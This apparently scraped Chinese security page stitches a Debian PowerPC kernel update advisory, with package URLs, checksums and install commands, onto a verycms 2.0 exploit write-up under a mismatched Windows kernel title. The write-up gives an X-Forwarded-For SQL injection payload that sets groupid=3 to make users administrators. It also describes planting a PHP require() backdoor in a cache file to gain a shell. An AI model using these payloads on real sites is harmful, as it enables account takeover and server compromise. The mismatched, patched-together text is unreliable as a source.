PowerPC architecture:

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power3_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 407398 e05e6f4cc9db78fb380752ffbdeb5da8

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power3-smp_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 407328 e8a001c81e071b8e20ae1c231a4c6995

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power4_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 406710 77a65238ea24808cffd01963a1fc1f63

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power4-smp_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 406636 bbc4a48430c0b9b8e65adb9acb8d7898

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-powerpc_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 407600 1369ada43ac7d75f21463e4d2f1c2f24

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-powerpc-smp_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 406756 958b261e91d96f980704c0f3f82b8e6a

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-headers-2.6.8-3_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 5147646 bf6d33036a5a150d791b09e021154206

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power3_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 13576992 151c64d944a5ba0f812596ec3c0d87c2

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power3-smp_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 13929732 a53f72b2554445b5753b905b5306bb90

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power4_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 13560758 ba215f514c5707a0eade2cc11f2bb0ff

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power4-smp_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 13921224 0fab2af9083ebfc6d70d09c1d35affc2

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-powerpc_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 13595362 6dc1b4542ce1738258d3529900c16b5d

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-powerpc-smp_2.6.8-12sarge4_powerpc.deb

Size/MD5 checksum: 13847816 9f0c9b62f6ef32fc3c16263db5a6c988

补丁安装方法：

1. 手工安装补丁包：

首先，使用下面的命令来下载补丁软件：

# wget url (url是补丁下载链接地址)

然后，使用下面的命令来安装补丁：

# dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包：

首先，使用下面的命令更新内部数据库：

# apt-get update

然后，使用下面的命令安装更新软件包：

# apt-get upgrade

Linux

-----

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.17.5.tar.bz2

篇10：verycms2.0权限提升漏洞

code:

passport_client.php

function Loginipwrite($winduid){

global $db,$timestamp,$onlineip;

$logininfo=”$onlineip|$timestamp|6“;

$db->update(

”UPDATE pw_user SET lastvisit=thisvisit,thisvisit=''$timestamp'',onlineip=''$logininfo'' WHERE uid=''$winduid''“);

}

再看$onlineip是怎么来的

Global.php

if($_SERVER[''HTTP_CLIENT_IP'']){

$onlineip=$_SERVER[''HTTP_CLIENT_IP''];

}elseif($_SERVER[''HTTP_X_FORWARDED_FOR'']){

$onlineip=$_SERVER[''HTTP_X_FORWARDED_FOR''];

}else{

$onlineip=$_SERVER[''REMOTE_ADDR''];

}

$onlineip =substrs($onlineip,16);

十六个字节，够提升权限的了吧？

抓包提交

HTTP_X_FORWARDED_FOR: '',groupid=3,/*

嘎嘎，每个人都成了管理员鸟

另外还有一点非常非常鸡肋的问题,在php.ini中若short_open_tag = off时可以得到shell

看 register.php中的一段代码

if($rg_allowsameip){

if(file_exists(D_P.'data/cache/ip_cache.php')){

writeover(D_P.'data/cache/ip_cache.php',”<$onlineip>“,”ab“);

}else{

writeover(D_P.'data/cache/ip_cache.php',”<$onlineip>");

}

我们注册的时候抓包提交 HTTP_X_FORWARDED_FOR 为 ?require($a);?

data/cache/ip_cache.php就变成了这样的形式

……

在php.ini中若short_open_tag = off， die() 就可以被饶过，从而执行我们的后门，

verycms2.0权限提升漏洞

，

【Microsoft Windows Kernel整数截断本地权限提升漏洞及修复】相关文章：

1.网赢企业网络营销平台注入漏洞及修复

2.Internet Explorer Help ActiveX控件本地安全域绕过漏洞

3.防溢出提升权限攻击解决办法WEB安全

4.漏洞词语近义词及造句

5.旅游电子版合同及漏洞

6.QQ空间存储xss漏洞一枚可打到cookie(含修复)

7.好孩子育儿网多处注入及修复方案

8.个人提升计划及总结

9.Ruubikcms v 1.1.0文件包含缺陷及修复

10.堵住无线路由器的网络漏洞及风险

《Microsoft Windows Kernel整数截断本地权限提升漏洞及修复.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

文档为doc格式

实用文图文推荐

Microsoft Windows Kernel整数截断本地权限提升漏洞及修复相关文章